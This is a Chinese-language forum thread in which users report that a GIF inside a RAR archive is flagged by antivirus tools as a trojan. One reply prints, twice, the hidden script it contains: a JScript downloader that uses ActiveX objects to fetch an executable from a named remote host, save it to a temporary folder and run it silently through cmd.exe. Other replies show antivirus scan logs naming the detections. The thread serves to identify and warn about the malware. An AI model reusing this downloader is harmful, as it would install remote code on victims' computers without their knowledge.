好奇怪啊，这个图片卡巴报木马！！！

gtljixie

压缩包的图片卡巴报毒！！！应该是改后缀了！！！大伙看看！！！！！

zzh161

木马，指向http://w18.vg/s.exe

sam.to

有什麼问题?

gtljixie

哦，谢谢斑竹

jimmyleo

并非有效图片

1. <script>
   
2. try
   
3. {
   
4. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
   
5. var Bf=document.createElement("object");
   
6. Bf.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
   
7. var Kx=Bf.CreateObject("Microsoft.X"+"MLHTTP","");
   
8. var AS=Bf.CreateObject("Adodb.Stream","");
   
9. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
   
10. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
11. AS.type=1;
    
12. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
13. Kx.open("GET", 'http://w18.vg/s.exe',0);
    
14. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
15. Kx.send();
    
16. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
17. Ns1='~Temp'+Math.round(Math.random()*9999)+'.tmp';
    
18. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
19. var cF=Bf.CreateObject("Scripting.FileSystemObject","");
    
20. var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);
    
21. AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Application","");
    
22. ok1=cF.BuildPath(NsTmp+'\\system32','cmd.exe');
    
23. q["ShellExecute"](ok1,' /c '+Ns1,"","open",0);
    
24. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
25. }
    
26. catch(xxfqeadsf) { xxfqeadsf=1; }
    
27. </script>
    
28. 
    
29. try
    
30. {
    
31. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
32. var Bf=document.createElement("object");
    
33. Bf.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    
34. var Kx=Bf.CreateObject("Microsoft.X"+"MLHTTP","");
    
35. var AS=Bf.CreateObject("Adodb.Stream","");
    
36. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
37. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
38. AS.type=1;
    
39. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
40. Kx.open("GET", 'http://w18.vg/s.exe',0);
    
41. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
42. Kx.send();
    
43. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
44. Ns1='~Temp'+Math.round(Math.random()*9999)+'.tmp';
    
45. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
46. var cF=Bf.CreateObject("Scripting.FileSystemObject","");
    
47. var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);
    
48. AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Application","");
    
49. ok1=cF.BuildPath(NsTmp+'\\system32','cmd.exe');
    
50. q["ShellExecute"](ok1,' /c '+Ns1,"","open",0);
    
51. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
    
52. }
    
53. catch(xxfqeadsf) { xxfqeadsf=1; }
    

复制代码

下载http://w18.vg/s.exe

leonfg

网址w18.vg，ZA block

mofunzone

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\opr000rz.rar'
C:\Documents and Settings\Administrator\My Documents\
  opr000rz.rar
    [0] Archive type: RAR
    --> opr000rz.gif
        [DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Small.EH
        [WARNING]   Infected files in archives cannot be repaired!
      [INFO]      The file was deleted!

dianziliqi

牛啊
学习了  谢谢 版主解释

jick117

检测到病毒: Trojan-Downloader.JS.Psyme.xz
文件: opr000rz.rar
目录: C:\Documents and Settings\Administrator\桌面
进程: 7zFM.exe

sdhlong

江民报毒！
如图：